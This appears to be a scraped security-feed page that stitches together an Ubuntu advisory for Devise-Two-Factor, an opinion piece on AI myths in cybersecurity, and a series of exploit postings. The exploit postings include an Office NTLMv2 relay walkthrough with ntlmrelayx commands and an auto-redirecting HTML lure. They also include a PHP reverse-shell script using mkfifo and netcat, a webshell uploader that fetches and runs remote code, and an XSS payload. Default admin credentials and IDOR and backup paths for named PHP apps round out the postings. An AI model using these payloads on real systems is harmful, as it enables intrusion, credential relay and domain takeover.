Ubuntu Security Notice 7050-1 - Benoit Côté-Jodoin and Michael Nipper discovered that Devise-Two-Factor incorrectly handled one-time password validation. An attacker could possibly use this issue to intercept and re-use a one-time password. Garrett Rappaport discovered that Devise-Two-Factor incorrectly handled generating multi-factor authentication codes. An attacker could possibly use this issue to generate valid multi-factor authentication codes.

==========================================================================  
Ubuntu Security Notice USN-7050-1  
October 01, 2024

ruby-devise-two-factor vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in Devise-Two-Factor.

Software Description:  
- ruby-devise-two-factor: Barebones two-factor authentication with Devise

Details:

Benoit Côté-Jodoin and Michael Nipper discovered that Devise-Two-Factor  
incorrectly handled one-time password validation. An attacker could  
possibly use this issue to intercept and re-use a one-time password.  
(CVE-2021-43177)

Garrett Rappaport discovered that Devise-Two-Factor incorrectly handled  
generating multi-factor authentication codes. An attacker could possibly  
use this issue to generate valid multi-factor authentication codes.  
(CVE-2024-8796)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
  ruby-devise-two-factor          4.0.0-2ubuntu0.1~esm1  
                                  Available with Ubuntu Pro

Ubuntu 20.04 LTS  
  ruby-devise-two-factor          3.1.0-2ubuntu0.1~esm1  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-7050-1   
<https://ubuntu.com/security/notices/USN-7050-1>  
  CVE-2021-43177, CVE-2024-8796

Ubuntu Security Notice USN-7050-1

Microsoft Office 2019 MSO build 1808 (16.0.10411.20011) and Microsoft 365 MSO version 2403 build 16.0.17425.20176 suffer from an NTLMv2 hash disclosure vulnerability.

# Exploit Title: Microsoft Office NTLMv2 Disclosure Vulnerability  
# Exploit Author: Metin Yunus Kandemir  
# Vendor Homepage: https://www.office.com/  
# Software Link: https://www.office.com/  
# Details: https://github.com/passtheticket/CVE-2024-38200  
# Version: Microsoft Office 2019 MSO Build 1808 (16.0.10411.20011), Microsoft 365 MSO (Version 2403 Build 16.0.17425.20176)  
# Tested against: Windows 11  
# CVE: CVE-2024-38200

# Description  
MS Office URI schemes allow for fetching a document from remote source.   
MS URI scheme format is '< scheme-name >:< command-name >"|"< command-argument-descriptor > "|"< command-argument >' .  
Example: ms-word:ofe|u|http://hostname:port/leak.docx  
When the URI "ms-word:ofe|u|http://hostname:port/leak.docx" is invoked from a victim computer. This behaviour is abused to capture and relay NTLMv2 hash over SMB and HTTP. For detailed information about capturing a victim user's NTLMv2 hash over SMB, you can also visit https://www.privsec.nz/releases/ms-office-uri-handlers.

# Proof Of Concept  
 If we add a DNS A record and use this record within the Office URI, Windows will consider the hostname as part of the Intranet Zone. In this way, NTLMv2 authentication occurs automatically and a standard user can escalate privileges without needing a misconfigured GPO. Any domain user with standard privileges can add a non-existent DNS record so this attack works with default settings for a domain user.

1. Add a DNS record to resolve hostname to attacker IP address which runs ntlmrelayx. It takes approximately 5 minutes for the created record to start resolving.  
$ python dnstool.py -u 'unsafe.local\testuser' -p 'pass' -r 'attackerhost' --action 'add' --data [attacker-host-IP] [DC-IP] --zone unsafe.local

2. Fire up ntlmrelayx with following command  
$ python ntlmrelayx.py -t ldap://DC-IP-ADDRESS --escalate-user testuser --http-port 8080

3. Serve following HTML file using Apache server. Replace hostname with added record (e.g. attackerhost).

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Microsoft Office</title>  
</head>  
<body>  
    <a id="link" href="ms-word:ofe|u|http://hostname:port/leak.docx"></a>

    <script>  
        function navigateToLink() {  
            var link = document.getElementById('link');  
            if (link) {  
                var url = link.getAttribute('href');  
                window.location.href = url;  
            }  
        }  
        window.onload = navigateToLink;  
    </script>  
</body>  
</html> 

4. Send the URL of the above HTML file to a user with domain admin privileges. You should check whether the DNS record is resolved with the ping command before sending the URL. When the victim user navigates to the URL, clicking the 'Open' button is enough to capture the NTLMv2 hash. (no warning!)

5. The captured NTLMv2 hash over HTTP is relayed to Domain Controller with ntlmrelayx. As a result, a standard user can obtain DCSync and Enterprise Admins permissions under the default configurations with just two clicks.

Microsoft Office NTLMv2 Disclosure

Organizations looking to maximize their security posture will find AI a valuable complement to existing people, systems, and processes.

Source: marcos alvarado via Alamy Stock Photo

COMMENTARY

The global rise of increasingly sophisticated cybercrimes creates daily challenges for the cybersecurity industry, as security professionals grapple with new and evolving attacks, complex IT architecture, and the integration of artificial intelligence (AI) into nefarious actors' tactics, techniques, and procedures (TTPs). As a result, cybersecurity practitioners feel a sense of urgency to stay at the forefront of technological advances to defend against a growing arsenal of exploits.

In this environment, a methodical approach to the intentional use of AI for cybersecurity protocols will help avoid falling prey to the hype and myths of groupthink, such as these five myths of AI and cybersecurity: 

**1\. You'll fall behind if AI isn't your primary solution for cybersecurity.**

While AI can enhance cybersecurity tasks by analyzing large volumes of data to recognize nefarious identifying patterns, it can also be susceptible to false positives and negatives, be trained on bad data, or act in unexpected ways. Many common cyber threats can still be effectively mitigated through basic security practices like strong passwords, regular patching, and employee awareness about social engineering. Incorporating AI into security solutions is not a license to abandon proven tools and replace established best practices. Sophisticated attackers will find ways to evade AI-based detection, so adopting AI cannot be the only solution for security and defense. Time-tested security practices like organizational culture, leadership commitment, and employee training are still critical fundamentals of a robust organizational risk management practice. 

**2\. Threat actors are using AI, which will lead to an exponential increase in cyberattacks.**

AI is undoubtedly a powerful tool that can be used for both good and bad — it's not a guaranteed game-changer for threat actors. The cybersecurity landscape is a dynamic battleground, and the interplay between AI-powered attacks and defenses is complex. AI may increase the speed and sophistication of certain attacks, such as better phishing attempts; however, it has not fundamentally changed the attack vectors or the attack surface within organizations. A mature security posture using foundational defensive practices continues to be a sound approach to reducing risk and thwarting attacks. 

**3\. AI-powered tools are better, and every tool needs an AI feature.**

AI-aided tools can provide powerful additions to a defensive infrastructure with quicker, more comprehensive data discovery. Left unchecked, AI is capable of producing sometimes comical but altogether bad results, such as the Google Overview suggestion of adding glue to homemade pizza sauce, or the McDonald's AI drive-through putting bacon on ice cream. In cybersecurity, erroneous results have serious consequences, including loss of trust, excessive costs, and endangering human safety. The potential benefit of any AI-powered resource must be balanced against the potential cost of error. The safest use of AI is within a layered defense model, which allows for verification and redundancy in protective solutions. 

**4\. You can only combat AI with AI.**

AI is a valuable tool in the cybersecurity quiver, but it's not impenetrable. Like any other defensive technique, attackers can exploit vulnerabilities in AI models or develop exploits to bypass AI defenses. Combating AI threats requires a multilayered approach that combines AI with human expertise, traditional security measures, and a strong focus on prevention, detection, and response. Using AI to combat AI may also raise ethical and legal concerns, particularly around issues like autonomous decision-making, accountability, and potential for misuse. These concerns must be carefully considered before implementation, to ensure responsible, ethical use of AI in cybersecurity. By leveraging the strengths of both humans and AI, organizations can build a more resilient and effective cybersecurity posture. 

**5\. AI is going to replace your job.**

Companies who are hiring fewer entry-level people for cybersecurity roles are not doing so because AI has eliminated those jobs; rather, they are limited by shrinking budgets and a need to hire people who can make an immediate impact when they come onboard. AI excels at automating repetitive tasks, analyzing vast amounts of data and identifying patterns, but human intuition and judgment is still needed to interpret those insights, make critical decisions, and adapt strategies to combat evolving threats. At its best, AI allows humans to focus on creative and strategic thinking to deliver complex problem-solving. The prominence of AI has created new jobs like AI engineers and AI ethicists to manage AI systems. AI-related roles, along with roles in cybersecurity, will continue to emerge and evolve. AI won't replace people, but people who know how to work with AI may replace people who don't. 

Effective cybersecurity requires a multilayered approach that combines technology, processes, and people. Solely relying on AI for cybersecurity can create a false sense of security, and AI-based cybersecurity solutions can be costly and complex. While AI is transforming the workforce, it's unlikely to lead to widespread job displacement. Instead, it likely will change the nature of work and require adaptation and development of new skills.

Progressive companies will see the value of investing in training programs and implementing policies that support workforce transition. Organizations looking to maximize their security posture with enhanced value, productivity, creativity, and innovation will find AI a valuable complement to existing people, systems, and processes.  

**About the Authors**

Senior Vice President & Executive Dean, Western Governors University

Paul Bingham is the senior vice president and executive dean at Western Governors University’s School of Technology, which currently serves 60,000 students nationwide and is the top conferrer of cybersecurity degrees in the country. Prior to WGU, Paul spent 24 years as an FBI agent, leading and managing domestic and international cybersecurity investigations and FBI SWAT teams on over 100 high-risk tactical missions. 

SIEM & Data Analytics Engineer, H2L Solutions Inc.

Micah VanFossen is a cybersecurity engineer currently working as a SIEM & Data Analytics Engineer at H2L Solutions Inc., where he focuses on data ETL (enrich, transform, load) processes, detections, and data analysis. He is a lifelong learner, spending time researching, studying, and educating others through his blog, The Purple Van. Micah is also a member of the SIII Tiger Team for the US Cyber Games Program and holds an MS in cybersecurity and information assurance from WGU.

Top 5 Myths of AI &amp; Cybersecurity

Tourism Management System version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Tourism Management System 1.0 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tourism_1.zip                                         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /rate_review.php?id=1"><script>alert(/indoushka/)</script>[+] http://localhost/tourism/rate_review.php?id=1%22%3E%3Cscript%3Ealert(/indoushka/)%3C/script%3EGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tourism Management System 1.0 Cross Site Scripting

TitanNit Web Control 2.01 and Atemio 7600 suffer from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : TitanNit Web Control 2.01 / Atemio 7600 php code injection Vulnerability                                                    |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.sat-world.com/Atemio-AM-520-HD-TitanNit-Edition                                                                 |  
=============================================================================================================================================

poc :

[+] Explanation: 

    We used the exec function to run the nc(netcat) command which subscribes to the subscriptions offered by the privileged execution.

    In Windows environments, you can use the netcat tool for communications headsets.

    Note: Make sure that netcat is installed on your system (you can download netcat for Windows). 

   [+] save as poc.php

[+] Usage : C:\www\test>php 3.php poc.php

[+] payload : 

<?php

class RemoteControl {

    private $timeout = 10;  
    private $target;  
    private $callback;  
    private $path = "/query?getcommand=&cmd=";  
    private $lport;  
    private $cmd;

    public function beacon() {  
        $this->cmd = "mkfifo /tmp/j;cat /tmp/j|sh -i 2>&1|nc ";  
        $this->cmd .= $this->callback . " ";  
        $this->cmd .= $this->lport . " ";  
        $this->cmd .= ">/tmp/j";  
        $this->path .= $this->cmd;

        $ch = curl_init($this->target . $this->path);  
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
        curl_exec($ch);  
        curl_close($ch);  
    }

    public function slusaj() {  
        echo "[*] Listening on port " . $this->lport . "\n";  
        sleep(1);

        // Windows solution using exec  
        $cmd = "nc -lvp " . $this->lport; // Example with netcat listener  
        exec($cmd, $output, $result_code);

                if ($result_code == 0) {  
            echo "[*] Rootshell session opened\n";  
            foreach ($output as $line) {  
                echo $line . "\n";  
            }  
        } else {  
            echo "[!] Error in executing the listener\n";  
        }  
    }

    public function tajmer() {  
        for ($z = $this->timeout; $z > 0; $z--) {  
            echo "[*] Callback waiting: " . $z . "s\r";  
            sleep(1);  
        }  
    }

    public function thricer() {  
        echo "[*] Starting callback listener\n";

        // Run listener in the background using exec  
        $this->slusaj();

        echo "[*] Generating callback payload\n";  
        sleep(1);  
        echo "[*] Calling\n";  
        $this->beacon();  
    }

    public function howto($argv) {  
        if (count($argv) != 4) {  
            $this->usage();  
        } else {  
            $this->target = $argv[1];  
            $this->callback = $argv[2];  
            $this->lport = (int)$argv[3];

            if (strpos($this->target, "http") === false) {  
                $this->target = "http://" . $this->target;  
            }  
        }  
    }

    public function dostabesemolk() {

    }

    public function usage() {  
        $this->dostabesemolk();  
        echo "Usage: php titan.php <target ip> <listen ip> <listen port>\n";  
        echo "Example: php titan.php 192.168.1.13:20000 192.168.1.8 9999\n";  
        exit(0);  
    }

    public function main($argv) {  
        $this->howto($argv);  
        $this->thricer();  
    }  
}

$control = new RemoteControl();  
$control->main($argv);  
?>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

TitanNit Web Control 2.01 / Atemio 7600 Code Injection

Teacher Subject Allocation Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Teacher Subject Allocation Management System 1.0 Insecure Settings Vulnerability                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/tsas/admin/login.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Teacher Subject Allocation Management System 1.0 Insecure Settings

Task Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Task Management System 1.0 php code injection Vulnerability                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/task-management-system-in-php-mysql-source-code/?wpdmdl=8164&refresh=66bb949d45e891723569309 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This PHP code is designed to create a file and inject PHP code.[+] save payload as poc.php [+] usage : C:\www\test>php poc.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'save' => '',        'firstname' => 'az',        'lastname' => 'azgt',        'email' => 'az@gt.gt',        'password' => 'az@gtgt',      'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),                  'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "$target_ip/ajax.php?action=update_user");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: $target_ip/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Task Management System 1.0 Code Injection

Supply Chain Management version 1.0 suffers from a backup disclosure vulnerability.

    =============================================================================================================================================| # Title     : Supply Chain Management v1.0 Backup Disclosure Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Supply_Chain_Management_IN_PHP_CSS_Js_AND_MYSQL__FREE_DOWNLOAD.zip         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /backup/[+] Panel : http://127.0.0.1/scm-master/backup/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Supply Chain Management 1.0 Backup Disclosure

Event Management System version 1.0 suffers from an insecure direct object reference vulnerability.

    =============================================================================================================================================| # Title     : Event Management System v1.0 IDOR Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202302/kashipara.com_event-mgt-sys-zip.zip                    |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] Use Payload : /admin/gallary.php[+] http://127.0.0.1/event_mgt_sys/admin/gallary.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Event Management System 1.0 Insecure Direct Object Reference

Student Attendance Management System version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Student Attendance Management System v1.0 Insecure Settings Vulnerability                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tag

#auth